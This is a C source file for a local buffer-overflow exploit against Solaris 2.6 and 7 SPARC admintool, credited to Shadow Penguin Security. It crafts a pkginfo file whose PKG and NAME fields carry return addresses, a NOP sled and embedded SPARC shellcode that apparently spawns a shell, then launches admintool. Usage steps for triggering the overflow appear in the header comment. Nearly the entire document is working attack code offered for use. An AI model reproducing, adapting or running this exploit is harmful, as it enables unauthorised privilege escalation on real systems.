/*=============================================================================
   admintool Overflow Exploits( Solaris2.6 and 7 for Sparc Edition)
   The Shadow Penguin Security (http://base.oc.to:/skyscraper/byte/551)
   Written by UNYUN (unewn4th@usa.net)
   [usage]
        % setenv DISPLAY=yourdisplay:0.0
        % gcc ex_admintool.c (This example program)
        % a.out
       ( [Browse] -> [Software] -> [Edit] -> [Add] -> [Harddisk]
         -> Directory: /tmp -> [Ok] )
        #

   In /tmp/EXP directory, the temp files are made, please remove it.
  =============================================================================
*/

#include <stdio.h>
#include <sys/utsname.h>

#define ADJUST1     2
#define ADJUST2     1
#define BUFSIZE1    1000
#define BUFSIZE2    800
#define OFFSET      3600
#define OFFSET2     400

#define PKGDIR      "mkdir /tmp/EXP"
#define PKGINFO     "/tmp/EXP/pkginfo"
#define PKGMAP      "/tmp/EXP/pkgmap"

#define NOP         0xa61cc013

char exploit_code[] =
"\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e\x2f\x0b\xda\xdc\xae\x15\xe3\x68"
"\x90\x0b\x80\x0e\x92\x03\xa0\x0c"
"\x94\x10\x20\x10\x94\x22\xa0\x10"
"\x9c\x03\xa0\x14"
"\xec\x3b\xbf\xec\xc0\x23\xbf\xf4\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc"
"\x82\x10\x20\x3b\x91\xd0\x20\x08\x90\x1b\xc0\x0f\x82\x10\x20\x01"
"\x91\xd0\x20\x08"
;

unsigned long get_sp(void)
{
__asm__("mov %sp,%i0 \n");
}

unsigned long ret_adr;
static char   x[500000];
FILE    *fp;
int     i,vofs=0;
struct utsname name;
main()
{
    uname(&name);
    if (strcmp(name.release,"5.7")==0) vofs=-904;

    system(PKGDIR);
    putenv("LANG=");
    if ((fp=fopen(PKGMAP,"wb"))==NULL){
        printf("Can not write '%s'\n",PKGMAP);
        exit(1);
    }
    fclose(fp);

    if ((fp=fopen(PKGINFO,"wb"))==NULL){
        printf("Can not write '%s'\n",PKGINFO);
        exit(1);
    }
    fprintf(fp,"PKG=");

    ret_adr=get_sp()-OFFSET+vofs;
    while ((ret_adr & 0xff000000) == 0 ||
           (ret_adr & 0x00ff0000) == 0 ||
           (ret_adr & 0x0000ff00) == 0 ||
           (ret_adr & 0x000000ff) == 0)
               ret_adr += 4;

    printf("Jumping address = %lx\n",ret_adr);
    memset(x,'a',4);
    for (i = ADJUST1; i < 1000; i+=4){
        x[i+3]=ret_adr & 0xff;
        x[i+2]=(ret_adr >>8 ) &0xff;
        x[i+1]=(ret_adr >> 16 ) &0xff;
        x[i+0]=(ret_adr >> 24 ) &0xff;
    }
    x[BUFSIZE1]=0;
    fputs(x,fp);
    fprintf(fp,"\n");

    fprintf(fp,"NAME=");
    memset(x,'a',4);
    for (i = ADJUST2; i < BUFSIZE2; i+=4){
        x[i+3]=NOP & 0xff;
        x[i+2]=(NOP >> 8 ) &0xff;
        x[i+1]=(NOP >> 16 ) &0xff;
        x[i+0]=(NOP >> 24 ) &0xff;
    }
    for (i=0; i<strlen(exploit_code); i++)
        x[i+ADJUST2+OFFSET2]=exploit_code[i];
    x[BUFSIZE2]=0;
    fputs(x,fp);
    fprintf(fp,"\n");

    fprintf(fp,"VERSION=1.00\n");
    fprintf(fp,"ARCH=sparc\n");
    fprintf(fp,"CLASSES=none\n");
    fprintf(fp,"CATEGORY=application\n");
    fprintf(fp,"PSTAMP=990721\n");
    fprintf(fp,"BASEDIR=/\n");
    fclose(fp);
    system("admintool");
}